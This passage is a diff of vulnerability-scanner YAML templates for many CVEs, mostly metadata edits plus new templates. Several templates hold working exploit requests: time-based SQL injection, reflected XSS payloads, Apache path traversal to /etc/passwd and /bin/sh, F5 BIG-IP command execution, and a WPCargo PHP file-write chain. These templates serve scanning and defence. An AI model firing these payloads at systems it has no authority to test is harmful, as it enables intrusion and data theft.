id: CVE-2020-13700
info:
name: WordPresss acf-to-rest-api <=3.1.0- Insecure Direct Object Reference
name: WordPresss acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference
author: pikpikcu
severity: high
description: |

2
cves/2020/CVE-2020-13937.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-13937
info:
name: Apache Kylin Exposed Configuration File
name: Apache Kylin - Exposed Configuration File
author: pikpikcu
severity: medium
description: Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication.

2
cves/2020/CVE-2020-14408.yaml
View File

@ -15,7 +15,7 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2020-14408
metadata:
verified: true
tags: cve,cve2022,cockpit,agentejo,xss,oss
tags: cve,cve2020,cockpit,agentejo,xss,oss
requests:
- method: GET

21
cves/2020/CVE-2020-19625.yaml
View File

@ -7,9 +7,9 @@ info:
description: |
Gridx 1.3 is susceptible to remote code execution via tests/support/stores/test_grid_filter.php, which allows remote attackers to execute arbitrary code via crafted values submitted to the $query parameter.
reference:
- http://mayoterry.com/file/cve/Remote_Code_Execution_Vulnerability_in_gridx_latest_version.pdf
- https://github.com/oria/gridx/issues/433
- https://nvd.nist.gov/vuln/detail/CVE-2020-19625
- http://mayoterry.com/file/cve/Remote_Code_Execution_Vulnerability_in_gridx_latest_version.pdf
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -19,23 +19,18 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=phpinfo();"
- "{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "6ca86c2c17047c14437f55c42c801c10"
- type: status
status:
- 200
- type: word
words:
- "PHP Extension"
- "PHP Version"
condition: and
extractors:
- type: regex
part: body
group: 1
regex:
- '<h1 class=\"p\">PHP Version ([0-9.]+)<\/h1>'
# Enhanced by mp on 2022/04/27

39
cves/2020/CVE-2020-21012.yaml Normal file
View File

@ -0,0 +1,39 @@
id: CVE-2020-21012
info:
name: Sourcecodester Hotel and Lodge Management System 2.0 - SQL Injection
author: edoardottt
severity: critical
description: |
Sourcecodester Hotel and Lodge Management System 2.0 contains a SQL injection vulnerability via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://github.com/hitIer/web_test/tree/master/hotel
- https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-21012
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-21012
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2020,hotel,sqli,unauth
requests:
- raw:
- |
POST /forgot_password.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
btn_forgot=1&email=1%27%20or%20sleep(6)%23
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(body, "Hotel Booking System")'
condition: and
# Enhanced by md on 2022/12/08

48
cves/2020/CVE-2020-24902.yaml Normal file
View File

@ -0,0 +1,48 @@
id: CVE-2020-24902
info:
name: Quixplorer <=2.4.1 - Cross-Site Scripting
author: edoardottt
severity: medium
description: |
Quixplorer through 2.4.1 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://dl.packetstormsecurity.net/1804-exploits/quixplorer241beta-xss.txt
- https://nvd.nist.gov/vuln/detail/CVE-2020-24902
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-24902
cwe-id: CWE-79
metadata:
google-dork: intitle:"My Download Server"
shodan-query: http.title:"My Download Server"
verified: "true"
tags: cve,cve2020,quixplorer,xss
requests:
- method: GET
path:
- '{{BaseURL}}/index.php?action=post&order=bszop%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script>&srt=yes"
- "My Download"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by md on 2022/12/08

45
cves/2020/CVE-2020-24903.yaml Normal file
View File

@ -0,0 +1,45 @@
id: CVE-2020-24903
info:
name: Cute Editor for ASP.NET 6.4 - Cross-Site Scripting
author: edoardottt
severity: medium
description: |
Cute Editor for ASP.NET 6.4 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://seclists.org/bugtraq/2016/Mar/104
- https://nvd.nist.gov/vuln/detail/CVE-2020-24903
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-24903
cwe-id: CWE-79
metadata:
shodan-query: http.component:"ASP.NET"
verified: "true"
tags: cve,cve2020,cuteeditor,xss,seclists
requests:
- method: GET
path:
- '{{BaseURL}}/CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS";><script>alert(document.domain)</script>'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script></p>"
- "System.Web"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by md on 2022/12/08

2
cves/2020/CVE-2020-25213.yaml
View File

@ -4,7 +4,7 @@ id: CVE-2020-25213
# http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt
info:
name: WordPress File Manager Plugin Remote Code Execution
name: WordPress File Manager Plugin - Remote Code Execution
author: foulenzer
severity: critical
description: The WordPress File Manager plugin prior to version 6.9 is susceptible to remote code execution. The vulnerability allows unauthenticated remote attackers to upload .php files.

2
cves/2020/CVE-2020-25223.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-25223
info:
name: Sophos UTM Preauth Remote Code Execution
name: Sophos UTM Preauth - Remote Code Execution
author: gy741
severity: critical
description: Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11.

2
cves/2020/CVE-2020-25506.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-25506
info:
name: D-Link DNS-320 Unauthenticated Remote Code Execution
name: D-Link DNS-320 - Unauthenticated Remote Code Execution
author: gy741
severity: critical
description: D-Link DNS-320 FW v2.06B01 Revision Ax is susceptible to a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution.

2
cves/2020/CVE-2020-2551.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-2551
info:
name: Oracle WebLogic Server Remote Code Execution
name: Oracle WebLogic Server - Remote Code Execution
author: dwisiswant0
severity: critical
description: |

40
cves/2020/CVE-2020-26248.yaml Normal file
View File

@ -0,0 +1,40 @@
id: CVE-2020-26248
info:
name: PrestaShop Product Comments <4.2.0 - SQL Injection
author: edoardottt
severity: high
description: |
PrestaShop Product Comments module before version 4.2.1 contains a SQL injection vulnerability, An attacker can use a blind SQL injection to retrieve data or stop the MySQL service, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.
reference:
- https://packetstormsecurity.com/files/160539/PrestaShop-ProductComments-4.2.0-SQL-Injection.html
- https://packagist.org/packages/prestashop/productcomments
- https://github.com/PrestaShop/productcomments/security/advisories/GHSA-5v44-7647-xfw9
- https://nvd.nist.gov/vuln/detail/CVE-2020-26248
remediation: Fixed in 4.2.1.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
cvss-score: 8.2
cve-id: CVE-2020-26248
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2020,sqli,prestshop,packetstorm
requests:
- raw:
- |
@timeout: 20s
GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains(body, "average_grade")'
condition: and
# Enhanced by md on 2022/12/08

45
cves/2020/CVE-2020-29284.yaml Normal file
View File

@ -0,0 +1,45 @@
id: CVE-2020-29284
info:
name: Sourcecodester Multi Restaurant Table Reservation System 1.0 - SQL Injection
author: edoardottt
severity: critical
description: |
Sourcecodester Multi Restaurant Table Reservation System 1.0 contains a SQL injection vulnerability via the file view-chair-list.php. It does not perform input validation on the table_id parameter, which allows unauthenticated SQL injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability.
reference:
- https://www.exploit-db.com/exploits/48984
- https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip
- https://github.com/BigTiger2020/-Multi-Restaurant-Table-Reservation-System/blob/main/README.md
- https://nvd.nist.gov/vuln/detail/CVE-2020-29284
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-29284
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve2020,tablereservation,sqli,unauth,edb,cve
requests:
- method: GET
path:
- "{{BaseURL}}/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=6'
- type: word
part: body
words:
- "Restaurent Tables"
- "Chair List"
condition: and
- type: status
status:
- 200
# Enhanced by md on 2022/12/08

2
cves/2020/CVE-2020-35729.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-35729
info:
name: Klog Server <=2.41- Unauthenticated Command Injection
name: Klog Server <=2.41 - Unauthenticated Command Injection
author: dwisiswant0
severity: critical
description: Klog Server 2.4.1 and prior is susceptible to an unauthenticated command injection vulnerability. The `authenticate.php` file uses the `user` HTTP POST parameter in a call to the `shell_exec()` PHP function without appropriate input validation, allowing arbitrary command execution as the apache user. The sudo configuration permits the Apache user to execute any command as root without providing a password, resulting in privileged command execution as root. Originated from Metasploit module, copyright (c) space-r7.

2
cves/2020/CVE-2020-35846.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-35846
info:
name: Agentejo Cockpit < 0.11.2 NoSQL Injection
name: Agentejo Cockpit < 0.11.2 - NoSQL Injection
author: dwisiswant0
severity: critical
description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function. The $eq operator matches documents where the value of a field equals the specified value.

2
cves/2020/CVE-2020-35847.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-35847
info:
name: Agentejo Cockpit <0.11.2 NoSQL Injection
name: Agentejo Cockpit <0.11.2 - NoSQL Injection
author: dwisiswant0
severity: critical
description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller.

2
cves/2021/CVE-2021-20114.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2021-20114
info:
name: TCExam <= 14.8.1 Sensitive Information Exposure
name: TCExam <= 14.8.1 - Sensitive Information Exposure
author: push4d
severity: high
description: When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which includes sensitive database backup files.

54
cves/2021/CVE-2021-20323.yaml Normal file
View File

@ -0,0 +1,54 @@
id: CVE-2021-20323
info:
name: Keycloak < 18.0.0 - Cross Site Scripting
author: ndmalc
severity: medium
description: |
Keycloak before 18.0.0 and after 10.0.0 allows a reflected XSS on client-registrations endpoint. On POST request, when a request is submitted, the application does not sanitize unknown attribute name before including it in the error response with a 'Content-Type' of text/hml. Once reflected, the response is interpreted as html. This can be performed on any realm present on the Keycloak instance. Currently, due to the bug requiring Content-Type application/json and is submitted via a POST, there is no common path to exploit that have a user impact.
reference:
- https://github.com/keycloak/keycloak/security/advisories/GHSA-m98g-63qj-fp8j
- https://bugzilla.redhat.com/show_bug.cgi?id=2013577
- https://access.redhat.com/security/cve/CVE-2021-20323
- https://github.com/ndmalc/CVE-2021-20323
- https://github.com/keycloak/keycloak/commit/3aa3db16eac9b9ed8c5335ac86f5f50e0c68662d
- https://nvd.nist.gov/vuln/detail/CVE-2021-20323
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-20323
cwe-id: CWE-79
metadata:
shodan-query: html:"Keycloak"
verified: "true"
tags: cve,cve2021,keycloak,xss
requests:
- method: POST
path:
- "{{BaseURL}}/auth/realms/master/clients-registrations/default"
- "{{BaseURL}}/auth/realms/master/clients-registrations/openid-connect"
- "{{BaseURL}}/realms/master/clients-registrations/default"
- "{{BaseURL}}/realms/master/clients-registrations/openid-connect"
headers:
Content-Type: application/json
body: "{\"Test<img src=x onerror=alert(document.domain)>\":1}"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Unrecognized field "Test<img src=x onerror=alert(document.domain)>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 400

14
cves/2021/CVE-2021-22986.yaml
View File

@ -1,19 +1,18 @@
id: CVE-2021-22986
info:
name: F5 BIG-IP iControl REST - Remote Command Execution
name: F5 BIG-IP iControl REST unauthenticated RCE
author: rootxharsh,iamnoooob
severity: critical
description: F5 BIG-IP iControl REST interface is susceptible to an unauthenticated remote command execution vulnerability.
description: The iControl REST interface has an unauthenticated remote command execution vulnerability.
reference:
- https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986
- https://support.f5.com/csp/article/K03009991
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22986
- http://packetstormsecurity.com/files/162059/F5-iControl-Server-Side-Request-Forgery-Remote-Command-Execution.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-22986
tags: bigip,cve,cve2021,rce,mirai,kev
tags: bigip,cve,cve2021,rce,kev,packetstorm
requests:
- raw:
@ -24,6 +23,7 @@ requests:
Authorization: Basic YWRtaW46
Content-Type: application/json
Cookie: BIGIPAuthCookie=1234
Connection: close
{"username":"admin","userReference":{},"loginReference":{"link":"http://localhost/mgmt/shared/gossip"}}
- |
@ -32,6 +32,7 @@ requests:
Accept-Language: en
X-F5-Auth-Token: {{token}}
Content-Type: application/json
Connection: close
{"command":"run","utilCmdArgs":"-c id"}
@ -43,7 +44,6 @@ requests:
group: 1
regex:
- "([A-Z0-9]{26})"
- type: regex
part: body
group: 1
@ -56,5 +56,3 @@ requests:
- "commandResult"
- "uid="
condition: and
# Enhanced by mp on 2022/05/05

37
cves/2021/CVE-2021-24827.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2021-24827
info:
name: Asgaros Forum < 1.15.13 - Unauthenticated SQL Injection
author: theamanrawat
severity: critical
description: |
The Asgaros Forum WordPress plugin before 1.15.13 does not validate and escape user input when subscribing to a topic before using it in a SQL statement, leading to an unauthenticated SQL injection issue.
reference:
- https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1
- https://wordpress.org/plugins/asgaros-forum/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24827
- https://plugins.trac.wordpress.org/changeset/2611560/asgaros-forum
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24827
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve2022,wp-plugin,asgaros-forum,unauth,wpscan,cve,wordpress,wp,sqli
requests:
- raw:
- |
@timeout: 15s
GET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "asgarosforum")'
condition: and

2
cves/2021/CVE-2021-24997.yaml
View File

@ -18,7 +18,7 @@ info:
tags: wordpress,guppy,api,cve2021,cve,wp-plugin,edb,wpscan
requests:
- method:
- method: GET
path:
- "{{BaseURL}}/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search="

51
cves/2021/CVE-2021-25003.yaml Normal file
View File

@ -0,0 +1,51 @@
id: CVE-2021-25003
info:
name: WPCargo < 6.9.0 - Unauthenticated Remote Code Execution
author: theamanrawat
severity: critical
description: |
The WPCargo Track & Trace WordPress plugin before 6.9.0 contains a file which could allow unauthenticated attackers to write a PHP file anywhere on the web server, leading to RCE.
reference:
- https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a
- https://wordpress.org/plugins/wpcargo/
- https://nvd.nist.gov/vuln/detail/CVE-2021-25003
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-25003
cwe-id: CWE-434
metadata:
verified: "true"
tags: rce,wpcargo,unauth,cve,cve2021,wordpress,wp,wp-plugin,wpscan
variables:
num: "999999999"
requests:
- raw:
- |
GET /wp-content/plugins/wpcargo/includes/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=var_dump HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2={{md5(num)}}
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1 != 200"
- "status_code_2 == 200"
- "status_code_3 == 200"
- "contains(body_3, md5(num))"
- "contains(body_3, 'PNG')"
condition: and

35
cves/2021/CVE-2021-25099.yaml Normal file
View File

@ -0,0 +1,35 @@
id: CVE-2021-25099
info:
name: Give < 2.17.3 - Cross-Site Scripting
author: theamanrawat
severity: medium
description: |
The GiveWP WordPress plugin before 2.17.3 does not sanitise and escape the form_id parameter before outputting it back in the response of an unauthenticated request via the give_checkout_login AJAX action, leading to a Reflected Cross-Site Scripting.
reference:
- https://wpscan.com/vulnerability/87a64b27-23a3-40f5-a3d8-0650975fee6f
- https://wordpress.org/plugins/give/
- https://nvd.nist.gov/vuln/detail/CVE-2021-25099
classification:
cve-id: CVE-2021-25099
metadata:
verified: true
tags: cve,cve2021,wordpress,wp-plugin,wp,xss,give,unauth
requests:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=give_checkout_login&form_id=xxxxxx"><script>alert(document.domain)</script>
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "<script>alert(document.domain)</script>")'
- 'contains(body, "give_user_login")'
condition: and

37
cves/2021/CVE-2021-3110.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2021-3110
info:
name: PrestaShop 1.7.7.0 - SQL Injection
author: Jaimin Gondaliya
severity: critical
description: |
PrestaShop 1.7.7.0 contains a SQL injection vulnerability via the store system. It allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://medium.com/@gondaliyajaimin797/cve-2021-3110-75a24943ca5e
- https://www.exploit-db.com/exploits/49410
- https://nvd.nist.gov/vuln/detail/CVE-2021-3110
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-3110
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2021,sqli,prestshop,edb
requests:
- raw:
- |
@timeout: 20s
GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains(body, "average_grade")'
condition: and
# Enhanced by md on 2022/12/08

2
cves/2021/CVE-2021-31682.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2021-31682
info:
name: WebCTRL OEM <= 6.5 Cross-Site Scripting
name: WebCTRL OEM <= 6.5 - Cross-Site Scripting
author: gy741,dhiyaneshDk
severity: medium
description: WebCTRL OEM 6.5 and prior is susceptible to a cross-site scripting vulnerability because the login portal does not sanitize the operatorlocale GET parameter.

6
cves/2021/CVE-2021-33851.yaml
View File

@ -1,11 +1,11 @@
id: CVE-2021-33851
info:
name: Customize Login Image < 3.5.3 - Cross-Site Scripting
name: WordPress Customize Login Image <3.5.3 - Cross-Site Scripting
author: 8authur
severity: medium
description: |
A cross-site scripting (XSS) attack can cause arbitrary code (JavaScript) to run in a user's browser and can use an application as the vehicle for the attack. The XSS payload given in the "Custom logo link" executes whenever the user opens the Settings Page of the "Customize Login Image" Plugin.
WordPress Customize Login Image plugin prior to 3.5.3 contains a cross-site scripting vulnerability via the custom logo link on the Settings page. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/c67753fb-9111-453e-951f-854c6ce31203
- https://cybersecurityworks.com/zerodays/cve-2021-33851-stored-cross-site-scripting-in-wordpress-customize-login-image.html
@ -62,3 +62,5 @@ requests:
regex:
- 'name="_wpnonce" value="([0-9a-zA-Z]+)"'
internal: true
# Enhanced by md on 2022/12/08

2
cves/2021/CVE-2021-35380.yaml
View File

@ -15,7 +15,7 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-35380
cwe-id: CWE-22
tags: cve,cve2022,termtalk,lfi,unauth,lfr,edb
tags: cve,cve2021,termtalk,lfi,unauth,lfr,edb
requests:
- method: GET

4
cves/2021/CVE-2021-35587.yaml
View File

@ -16,8 +16,10 @@ info:
cve-id: CVE-2021-35587
cwe-id: CWE-502
metadata:
verified: true
fofa-query: body="/oam/pages/css/login_page.css"
tags: cve,cve2021,oam,rce,java,unauth,oracle
shodan-query: http.title:"Oracle Access Management"
tags: cve,cve2021,oam,rce,java,unauth,oracle,kev
requests:
- method: GET

5
cves/2021/CVE-2021-37704.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2021-37704
info:
name: phpinfo Resource Exposure
name: phpfastcache - phpinfo Resource Exposure
author: whoever
severity: medium
description: phpinfo() is susceptible to resource exposure in unprotected composer vendor folders via phpfastcache/phpfastcache.
@ -15,7 +15,7 @@ info:
cvss-score: 4.3
cve-id: CVE-2021-37704
cwe-id: CWE-668
tags: cve,cve2021,exposure,phpfastcache,phpinfo
tags: cve,cve2021,exposure,phpfastcache,phpinfo,phpsocialnetwork
requests:
- method: GET
@ -23,6 +23,7 @@ requests:
- "{{BaseURL}}/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php"
- "{{BaseURL}}/vendor/phpfastcache/phpfastcache/examples/phpinfo.php"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word

2
cves/2021/CVE-2021-38751.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2021-38751
info:
name: ExponentCMS <= 2.6 Host Header Injection
name: ExponentCMS <= 2.6 - Host Header Injection
author: dwisiswant0
severity: medium
description: An HTTP Host header attack exists in ExponentCMS 2.6 and below in /exponent_constants.php. A modified HTTP header can change links on the webpage to an arbitrary value,leading to a possible attack

2
cves/2021/CVE-2021-40438.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2021-40438
info:
name: Apache <= 2.4.48 Mod_Proxy SSRF
name: Apache <= 2.4.48 - Mod_Proxy SSRF
author: pdteam
severity: critical
description: Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.

40
cves/2021/CVE-2021-40661.yaml Normal file
View File

@ -0,0 +1,40 @@
id: CVE-2021-40661
info:
name: IND780 - Directory Traversal
author: For3stCo1d
severity: high
description: |
A remote, unauthenticated, directory traversal vulnerability was identified within the web interface used by IND780 Advanced Weighing Terminals Build 8.0.07 March 19, 2018 (SS Label 'IND780_8.0.07'), Version 7.2.10 June 18, 2012 (SS Label 'IND780_7.2.10'). It was possible to traverse the folders of the affected host by providing a traversal path to the 'webpage' parameter in AutoCE.ini This could allow a remote unauthenticated adversary to access additional files on the affected system. This could also allow the adversary to perform further enumeration against the affected host to identify the versions of the systems in use, in order to launch further attacks in future.
reference:
- https://sidsecure.au/blog/cve-2021-40661/?_sm_pdc=1&_sm_rid=MRRqb4KBDnjBMJk24b40LMS3SKqPMqb4KVn32Kr
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40661
- https://www.mt.com/au/en/home/products/Industrial_Weighing_Solutions/Terminals-and-Controllers/terminals-bench-floor-scales/advanced-bench-floor-applications/IND780/IND780_.html#overviewpm
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-40661
cwe-id: CWE-22
metadata:
google-query: inurl:excalweb.dll
shodan-query: IND780
verified: "true"
tags: cve,cve2021,ind780,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/IND780/excalweb.dll?webpage=../../AutoCE.ini"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'ExePath=\Windows'
- 'WorkDir=\Windows'
condition: and
- type: status
status:
- 200

2
cves/2021/CVE-2021-41174.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2021-41174
info:
name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering Cross-Site Scripting
name: Grafana 8.0.0 <= v.8.2.2 - Angularjs Rendering Cross-Site Scripting
author: pdteam
severity: medium
description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions.

11
cves/2021/CVE-2021-41773.yaml
View File

@ -4,7 +4,8 @@ info:
name: Apache 2.4.49 - Path Traversal and Remote Code Execution
author: daffainfo,666asd
severity: high
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
description: |
A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
reference:
- https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
- https://nvd.nist.gov/vuln/detail/CVE-2021-41773
@ -12,15 +13,14 @@ info:
- https://twitter.com/ptswarm/status/1445376079548624899
- https://twitter.com/h4x0r_dz/status/1445401960371429381
- https://github.com/blasty/CVE-2021-41773
remediation: Update to Apache HTTP Server 2.4.50 or later.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-41773
cwe-id: CWE-22
metadata:
shodan-query: apache version:2.4.49
verified: "true"
shodan-query: Apache 2.4.49
tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,kev
variables:
@ -32,6 +32,10 @@ requests:
GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: {{Hostname}}
- |
GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1
Host: {{Hostname}}
- |
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: {{Hostname}}
@ -42,7 +46,6 @@ requests:
stop-at-first-match: true
matchers-condition: or
matchers:
- type: regex
name: LFI
regex:

52
cves/2021/CVE-2021-43421.yaml Normal file
View File

@ -0,0 +1,52 @@
id: CVE-2021-43421
info:
name: Studio-42 elFinder < 2.1.60 - Arbitrary File Upload
author: akincibor
severity: critical
description: |
